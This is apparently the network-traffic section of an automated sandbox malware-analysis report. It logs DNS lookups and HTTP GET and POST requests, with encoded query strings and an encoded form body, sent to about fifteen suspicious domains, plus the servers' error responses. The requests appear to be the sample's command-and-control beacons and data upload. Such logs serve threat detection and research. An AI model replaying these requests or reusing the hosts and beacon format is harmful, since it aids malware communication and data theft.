                Source: Joe Sandbox ViewASN Name: LILLY-ASUS LILLY-ASUS
                Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
                Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
                Source: Joe Sandbox ViewASN Name: HOSTNETNL HOSTNETNL
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /yubh/?3tV=MGGAmHlvP++E3KpIg/FvL8i1JT0OgWxwxFcygqL2UA5R59sdx989XYnZ+w7o4wVQKi3RHCwbh3FXDB4APLYG/bTnAIRthbjQ9IlTiulES96X0xboBN3l7cI=&IhkTb=xPfHG0o8kZI8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.jz07259dkijw.cloudUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /1ki5/?3tV=gsCq1lWJF1dgPZoYALsPcNVJYLoWokZlTtBhbiV8szE8yhkYsHvmTVOKeDfgQfnx9IrMke6/s2GfQFtZ1s1QNRcJqVfOe3H7gjz1UwsXUQ8sNONuaUThKkQ=&IhkTb=xPfHG0o8kZI8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.academy-training.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /5jwl/?3tV=WiqaMLg9GlvLXaJn7h+mylxer0KY04sj1yDW0eaYUTp/DgBuxfteLRta+sEBNgYjuWmWpmmo3drGW8kplXtIxb0p1+mOEbGDGuu9pjk/4w3rZz7uLvbccNY=&IhkTb=xPfHG0o8kZI8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.fslab.techUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /ymla/?3tV=BvqHMV0nWlC/dF1qQ9SGd92esk2/yxlmtXJ+OaeVO1Q20dRfY2N3KYLrsWHVHDovdhcIqetDFv1Luq7dPE3I+iALpNHIcfNrfKqLui+R/P1jGO4yN6sj+Bs=&IhkTb=xPfHG0o8kZI8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.vip66.zoneUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /top4/?3tV=5a3hUq11SmISK3qHdKia2mXgwLRkVM4pZnP+iXsVHcY4SpqJYUoammEh9pPyYI3IhaBpEAAW18wtS0XedlaJcs6ggHC5hAq1Qhwp4jbHazxRVHta3ZSkp7g=&IhkTb=xPfHG0o8kZI8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.lyxor.topUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /swnk/?3tV=YIofVfs+RVMTlTiIWsRg/2NG6LSwccZ17VOMMr8T7NjJGKpRQCPlXVPp8EduD1P6e8BrQW5t6vS2RBJAYjg4WvzfcnuaE4r1Crjp7jLNpS7ccpgL3d7XEEo=&IhkTb=xPfHG0o8kZI8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.unveiled.digitalUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /7ew2/?IhkTb=xPfHG0o8kZI8&3tV=IAPJnQ6xP9g+To7sKnTlpdONgQ/IZpMKDV4JVaWfPzS1iBgaX2aSuicPSUKP+tbyByJ2nvQBfa7E+7/p3v0hf5xqKOi6z2fPcNVZO3WzTaW3LMTOzeMZHpQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.cake11298.onlineUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /c85h/?IhkTb=xPfHG0o8kZI8&3tV=kYZ1lXq/hdZH/uis+T00xzejxPvlo8rfV8miq8Z/KrwXBz2m8C0A0d48n8FfouwDJQDRltn1A61Jy1UNPVSm21uxUE+/nj7G5dxHpoV9EucdjLBiC53j1jk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.jobworklanka.onlineUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /25kr/?3tV=OBaZfyA9mrXrqkerGJdoBE4AUoAB8BDMFL96R6e2a3wywxYSJcqYm8ZoKYyxvhEHyag814v77I5kSeFlkRp9ldlOkmNbRx3b8AF2oRSh5frHPX5DuU6sJMI=&IhkTb=xPfHG0o8kZI8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.shipincheshi.skinUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /78aq/?IhkTb=xPfHG0o8kZI8&3tV=wn0evRzkTpjhxs8ZI7f7bdp7QNRPmMli5Za2X/d72voTd3Hgl3DgiTlHV2cFEBs8tUuCcCOjEkMrQzdfzw17g/NW6ia3GXbmRujRfaIyiSnkayos5qIY2c4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.sssqqq07-22.funUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /n3rq/?3tV=AokcV8lrD1iGOQWcBcmCrANBpf6sr5VfHV9HQUhaLRmf3Oh9ttLkjbrN5cmv13PiDvU4asCjKcP/FjbrfTOvR8dEp5E+Erc+ELSxl31AK9blM+O7DS4CIrs=&IhkTb=xPfHG0o8kZI8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.justlivn.netUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /2frz/?3tV=l87n7Q89KFkj22mcQvGyKsY8DOdSYtwW2ZIksm0w5n2yQMdP8QPDEmc5KUTMu6S9hUr3H6R86Tmthm+6q52UOZ+nCsRLRXiC8/ThNXsRz23FX+gx8VT4y+4=&IhkTb=xPfHG0o8kZI8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.healtheduction.siteUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /tni7/?IhkTb=xPfHG0o8kZI8&3tV=Pin1WdfA+NS6cNSxoiNhG1YTVXa1Eh3sPPVbkgnhBmMZ4UpRd1NHllH88EmBo/tJBgeDNt41XaNDTXpF9fqEP/qeQ/p/TwjIkU/ZAha4TiA1Pr+q7OP4Tjw= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.globyglen.infoUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                Source: global trafficDNS traffic detected: DNS query: www.jz07259dkijw.cloud
                Source: global trafficDNS traffic detected: DNS query: www.academy-training.xyz
                Source: global trafficDNS traffic detected: DNS query: www.fslab.tech
                Source: global trafficDNS traffic detected: DNS query: www.vip66.zone
                Source: global trafficDNS traffic detected: DNS query: www.lyxor.top
                Source: global trafficDNS traffic detected: DNS query: www.unveiled.digital
                Source: global trafficDNS traffic detected: DNS query: www.cake11298.online
                Source: global trafficDNS traffic detected: DNS query: www.xsg.icu
                Source: global trafficDNS traffic detected: DNS query: www.jobworklanka.online
                Source: global trafficDNS traffic detected: DNS query: www.shipincheshi.skin
                Source: global trafficDNS traffic detected: DNS query: www.sssqqq07-22.fun
                Source: global trafficDNS traffic detected: DNS query: www.justlivn.net
                Source: global trafficDNS traffic detected: DNS query: www.mypos.support
                Source: global trafficDNS traffic detected: DNS query: www.healtheduction.site
                Source: global trafficDNS traffic detected: DNS query: www.globyglen.info
                Source: unknownHTTP traffic detected: POST /1ki5/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brCache-Control: no-cacheContent-Length: 200Content-Type: application/x-www-form-urlencodedConnection: closeHost: www.academy-training.xyzOrigin: http://www.academy-training.xyzReferer: http://www.academy-training.xyz/1ki5/User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like GeckoData Raw: 33 74 56 3d 74 75 71 4b 32 56 7a 6e 4c 78 51 54 4d 71 59 32 43 35 4a 6b 56 66 6c 68 54 4c 51 70 7a 48 46 46 4a 4d 30 73 63 41 73 77 38 67 56 6a 75 42 68 44 78 41 76 49 44 45 2b 37 52 51 36 67 66 4f 58 41 70 59 53 38 72 59 72 49 74 6c 6d 33 41 6e 38 62 77 71 42 46 4a 79 34 35 34 46 43 5a 58 41 4c 77 35 67 71 64 5a 46 55 79 54 77 70 2f 4e 73 35 32 61 45 75 44 41 6b 53 59 74 30 53 66 72 66 77 58 61 63 6b 56 52 58 71 41 48 71 69 79 76 54 6a 65 4e 39 67 37 31 2b 32 7a 50 33 4d 67 71 6a 4e 44 44 34 6b 51 68 69 66 38 56 4b 32 6d 32 5a 36 71 44 2f 4e 66 57 32 52 35 65 36 65 6d 79 30 79 65 34 67 3d 3d Data Ascii: 3tV=tuqK2VznLxQTMqY2C5JkVflhTLQpzHFFJM0scAsw8gVjuBhDxAvIDE+7RQ6gfOXApYS8rYrItlm3An8bwqBFJy454FCZXALw5gqdZFUyTwp/Ns52aEuDAkSYt0SfrfwXackVRXqAHqiyvTjeN9g71+2zP3MgqjNDD4kQhif8VK2m2Z6qD/NfW2R5e6emy0ye4g==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Sep 2024 13:05:31 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 12 Sep 2024 13:05:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: nginxX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffStrict-Transport-Security: max-age=63072000; includeSubDomainsContent-Encoding: gzipData Raw: 39 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 3d 8e cd 0a c2 30 10 84 ef 7d 8a a1 97 de 0c 0a 5e 24 e6 22 f6 e6 45 7d 81 90 ac 6d a8 64 eb 6e aa f8 f6 56 91 ce 6d 7e 3e 18 db 6f dc 29 a9 a6 dc 81 05 29 07 16 a1 50 70 b8 9c 5b 04 e6 21 11 ca 7b a4 95 35 f3 b4 b2 23 c2 dd ab ee 6b 12 61 a9 5d 85 59 56 8b 70 ee dc f1 9b ed 60 cd df ff ca 6b 4f 10 7a 4c a4 85 22 7c 8c 42 aa 0b d2 98 f5 90 b6 a6 59 18 bc bc 22 73 c1 8d a7 1c c1 19 a5 4f 0a 25 79 92 cc 2f 46 57 7d 00 ce cb 33 48 b5 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 9e=0}^$"E}mdnVm~>o))Pp[!{5#ka]YVp`kOzL"|BY"sO%y/FW}3H0
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 12 Sep 2024 13:05:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: nginxX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffStrict-Transport-Security: max-age=63072000; includeSubDomainsContent-Encoding: gzipData Raw: 39 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 3d 8e cd 0a c2 30 10 84 ef 7d 8a a1 97 de 0c 0a 5e 24 e6 22 f6 e6 45 7d 81 90 ac 6d a8 64 eb 6e aa f8 f6 56 91 ce 6d 7e 3e 18 db 6f dc 29 a9 a6 dc 81 05 29 07 16 a1 50 70 b8 9c 5b 04 e6 21 11 ca 7b a4 95 35 f3 b4 b2 23 c2 dd ab ee 6b 12 61 a9 5d 85 59 56 8b 70 ee dc f1 9b ed 60 cd df ff ca 6b 4f 10 7a 4c a4 85 22 7c 8c 42 aa 0b d2 98 f5 90 b6 a6 59 18 bc bc 22 73 c1 8d a7 1c c1 19 a5 4f 0a 25 79 92 cc 2f 46 57 7d 00 ce cb 33 48 b5 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 9e=0}^$"E}mdnVm~>o))Pp[!{5#ka]YVp`kOzL"|BY"sO%y/FW}3H0
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 12 Sep 2024 13:05:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: nginxX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffStrict-Transport-Security: max-age=63072000; includeSubDomainsContent-Encoding: gzipData Raw: 39 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 3d 8e cd 0a c2 30 10 84 ef 7d 8a a1 97 de 0c 0a 5e 24 e6 22 f6 e6 45 7d 81 90 ac 6d a8 64 eb 6e aa f8 f6 56 91 ce 6d 7e 3e 18 db 6f dc 29 a9 a6 dc 81 05 29 07 16 a1 50 70 b8 9c 5b 04 e6 21 11 ca 7b a4 95 35 f3 b4 b2 23 c2 dd ab ee 6b 12 61 a9 5d 85 59 56 8b 70 ee dc f1 9b ed 60 cd df ff ca 6b 4f 10 7a 4c a4 85 22 7c 8c 42 aa 0b d2 98 f5 90 b6 a6 59 18 bc bc 22 73 c1 8d a7 1c c1 19 a5 4f 0a 25 79 92 cc 2f 46 57 7d 00 ce cb 33 48 b5 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 9e=0}^$"E}mdnVm~>o))Pp[!{5#ka]YVp`kOzL"|BY"sO%y/FW}3H0
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 12 Sep 2024 13:05:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: nginxX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffStrict-Transport-Security: max-age=63072000; includeSubDomainsContent-Encoding: gzipData Raw: 39 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 3d 8e cd 0a c2 30 10 84 ef 7d 8a a1 97 de 0c 0a 5e 24 e6 22 f6 e6 45 7d 81 90 ac 6d a8 64 eb 6e aa f8 f6 56 91 ce 6d 7e 3e 18 db 6f dc 29 a9 a6 dc 81 05 29 07 16 a1 50 70 b8 9c 5b 04 e6 21 11 ca 7b a4 95 35 f3 b4 b2 23 c2 dd ab ee 6b 12 61 a9 5d 85 59 56 8b 70 ee dc f1 9b ed 60 cd df ff ca 6b 4f 10 7a 4c a4 85 22 7c 8c 42 aa 0b d2 98 f5 90 b6 a6 59 18 bc bc 22 73 c1 8d a7 1c c1 19 a5 4f 0a 25 79 92 cc 2f 46 57 7d 00 ce cb 33 48 b5 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 9e=0}^$"E}mdnVm~>o))Pp[!{5#ka]YVp`kOzL"|BY"sO%y/FW}3H0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 13:05:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: nginxX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffStrict-Transport-Security: max-age=63072000; includeSubDomainsData Raw: 31 32 63 0d 0a 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 20 20 20 20 3c 73 74 72 6f 6e 67 3e 45 72 72 6f 72 3a 20 3c 2f 73 74 72 6f 6e 67 3e 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 61 64 64 72 65 73 73 20 3c 73 74 72 6f 6e 67 3e 27 2f 31 6b 69 35 2f 3f 33 74 56 3d 67 73 43 71 31 6c 57 4a 46 31 64 67 50 5a 6f 59 41 4c 73 50 63 4e 56 4a 59 4c 6f 57 6f 6b 5a 6c 54 74 42 68 62 69 56 38 73 7a 45 38 79 68 6b 59 73 48 76 6d 54 56 4f 4b 65 44 66 67 51 66 6e 78 39 49 72 4d 6b 65 36 2f 73 32 47 66 51 46 74 5a 31 73 31 51 4e 52 63 4a 71 56 66 4f 65 33 48 37 67 6a 7a 31 55 77 73 58 55 51 38 73 4e 4f 4e 75 61 55 54 68 4b 6b 51 3d 26 61 6d 70 3b 49 68 6b 54 62 3d 78 50 66 48 47 30 6f 38 6b 5a 49 38 27 3c 2f 73 74 72 6f 6e 67 3e 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 12c<h2>Not Found</h2><p class="error"> <strong>Error: </strong> The requested address <strong>'/1ki5/?3tV=gsCq1lWJF1dgPZoYALsPcNVJYLoWokZlTtBhbiV8szE8yhkYsHvmTVOKeDfgQfnx9IrMke6/s2GfQFtZ1s1QNRcJqVfOe3H7gjz1UwsXUQ8sNONuaUThKkQ=&amp;IhkTb=xPfHG0o8kZI8'</strong> was not found on this server.</p>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Sep 2024 13:06:01 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Sep 2024 13:06:03 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Sep 2024 13:06:06 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Sep 2024 13:06:09 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 13:06:28 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
